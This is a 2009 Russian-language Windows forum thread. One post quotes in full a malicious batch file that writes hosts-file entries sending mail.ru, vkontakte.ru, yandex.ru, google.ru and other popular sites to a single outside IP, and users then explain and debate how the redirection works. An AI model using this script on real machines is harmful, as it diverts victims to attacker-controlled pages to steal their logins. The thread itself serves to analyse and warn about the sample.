Опрос
Вы участвуете в программе Windows Insider?
Популярные новости
Обсуждаемые новости

26
Не в сети
Сообщений: 405
Благодарностей: 6
Предупреждений:
Из: Ukraine
Род занятий: IT

karinas, это Вы так думаете, что ничего страшного. Многие пользователи кнопку обновить найти не могут, не то что планировщик настроить Так что МС просто необходимо в ближайшее время выпустить обновление, т.к. вся безопасность сводиться на нет.
Johny-electric, проблему обновлений в новой сборке все еще не устранили?

#183136   | 26.10.09 18:27
Не в сети
Сообщений: 3329
Благодарностей: 391
Предупреждений:
Из: Russia Усть-Илимск
Род занятий: Электромонтёр

v_gayevoy, да все также с запозданием. А вы сами то поставили эту версию? Или вас смущает слово "beta"?

#183148   | 26.10.09 21:27
Не в сети
Сообщений: 405
Благодарностей: 6
Предупреждений:
Из: Ukraine
Род занятий: IT

Johny-electric, Я продукты "beta" не использую. Только для тестирования на виртуалках. Но сейчас времени совсем нету, поэтому еще не поставил.

#183150   | 26.10.09 21:31
Не в сети
Сообщений: 522
Благодарностей: 23
Предупреждений:
Из: Russia LostFilm.TV (ЛостФильм.ТВ)
Род занятий:

И снова наши любимые батники

qip_unfium.bat

@rem ----- Exescript Options Begin -----
@rem scriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- Exescript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts



и снова мы их непалим...

если кому интересно как они распространяются http://habrahabr.ru/blogs/infosecurity/73515/

из написаного вывод - лучший антивирь это учётная запись "Гость"....

#183229   | 27.10.09 18:39
Не в сети
Сообщений: 3165
Благодарностей: 272
Предупреждений:
Из: Israel T.A.
Род занятий: IT

LOST писал:из написаного вывод - лучший антивирь это учётная запись "Гость"....


+1, а также полное обесточение электричества и батарей.

#183245   | 27.10.09 23:35
Не в сети
Сообщений: 405
Благодарностей: 6
Предупреждений:
Из: Ukraine
Род занятий: IT

LOST, arseny1992, А что делает этот скрипт? Перенаправляет на указаный ip при попытке зайти на сайт? А при чем тут уч. запись "Гость"?

#183250   | 27.10.09 23:49
Не в сети
Сообщений: 3165
Благодарностей: 272
Предупреждений:
Из: Israel T.A.
Род занятий: IT

v_gayevoy, этот скрипт записывает локальную DNS-запись для указанного адреса. Windows всегда сначала смотрит свой hosts, а потом, если не находит там записи, обращается к DNS-серверам для разрешения адреса в IP.

Учётная запись "Гость" как-раз при том, что её права ещё ниже чем у обычного пользователя и гость по любому не сможет внести изменения в саму систему.

LOST, спасибо, https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?submissionid=703AC2E6-A24D-4D41-9F37-063AB31B9561




Вот те раз
Параллельно "устанавливается" CheckSUR - Post #183242.

#183257   | 28.10.09 01:00
Не в сети
Сообщений: 405
Благодарностей: 6
Предупреждений:
Из: Ukraine
Род занятий: IT

arseny1992, т.е. при попытке зайти на сайт пользователь будет перенаправлен на 81.94.229.115?

#183263   | 28.10.09 01:28
Не в сети
Сообщений: 3165
Благодарностей: 272
Предупреждений:
Из: Israel T.A.
Род занятий: IT

v_gayevoy, именно так. Но не перенаправлен, а сразу туда попадать. Вот вы к примеру сейчас выполните

nslookup thevista.ru


и узнаете IP нашего сайта, что дадут DNS-сервера. А если вам в hosts записать левый IP и наш домен, то ваша система будет сразу попадать на сайт на данном IP. hosts является локальным DNS-сервером. Так как этот файл изначально весь закомментирован #, то его в принципе можно и удалить. Однако он будет создаваться если пойдёт на него запрос на запись.

#183265   | 28.10.09 01:39
Не в сети
Сообщений: 405
Благодарностей: 6
Предупреждений:
Из: Ukraine
Род занятий: IT

arseny1992, ок, пасибо за разьяснения

#183266   | 28.10.09 01:51
Не в сети
Сообщений: 3165
Благодарностей: 272
Предупреждений:
Из: Israel T.A.
Род занятий: IT

К слову, данный IP, который фигуирует в скрипте выше, уже отключён.

#183267   | 28.10.09 03:06
Не в сети
Сообщений: 17
Благодарностей: 3
Предупреждений:
Из: ---
Род занятий:

Ребята, успокойтесь. Этот скрипт не сможет модифицировать файл hosts, т.к. к нему нет доступа даже у админа. Единственный, кто может получить проблемы от подобного батника - это лох, отключающий UAC.
Так что завязывайте нести чушь про пользователя "Гость". Ни Висте, ни Вин7 подобный батник ничем не грозит.

#183269   | 28.10.09 09:25
Не в сети
Сообщений: 21
Благодарностей: 0
Предупреждений:
Из: Russia
Род занятий: Telecom

Видимо последнее обновление создало на диске папку и пару файлов с кривыми именами
файлы с расширением .vdm
эффект наблюдается на висте и хр.

#183273   | 28.10.09 10:04
Не в сети
Сообщений: 3165
Благодарностей: 272
Предупреждений:
Из: Israel T.A.
Род занятий: IT

denominator писал:т.к. к нему нет доступа даже у админа


Простите, но по умолчанию на вкладке Безопасность данного файла стоят: полный доступ пользователю NT AUTHORITY\SYSTEM и группе Administrators. Ещё группа Users: чтение, и чтение и выполнение.

denominator писал:это лох, отключающий UAC


+1, те пусть идут лесом, лично я сижу с мксимальным уровнем UAC и меня это устраивает, в отличие от некоторых.

Но есть ещё те, у кого UAC включён, но они не вчитываются в текст, то есть для тех это тупо "нажмите Да чтобы выполнить действие", а какое действие - это для них значения не имеет. См. комментарии на хабре по ссылке LOST'а выше.

Ещё можно запланировать любое событие через планировщик, и пользователь ничего не заметит, так как событие выполнится от имени системы (NT AUTHORITY\SYSTEM) которая имеет доступ во всё. Хотя и тут UAC вроде должен остановить перед внесением изменений в планировщик..

humppa, какими кривыми именами? Это как раз антивирусные базы и есть.

#183274   | 28.10.09 10:04
Не в сети
Сообщений: 21
Благодарностей: 0
Предупреждений:
Из: Russia
Род занятий: Telecom

По содержимому понятно, что это сигнатуры, но непонятно почему они в корне диска теперь валяются (почему не были удалены, если это временные файлы). И на висте доступ к ним ограничен.

#183275   | 28.10.09 10:25
Все права принадлежат © ms insider @thevista.ru, 2022
Сайт является источником уникальной информации о семействе операционных систем Windows и других продуктах Microsoft. Перепечатка материалов возможна только с разрешения редакции.
Работает на WMS 2.34 (Страница создана за 0.032 секунд (Общее время SQL: 0.013 секунд - SQL запросов: 98 - Среднее время SQL: 0.00013 секунд))
Top.Mail.Ru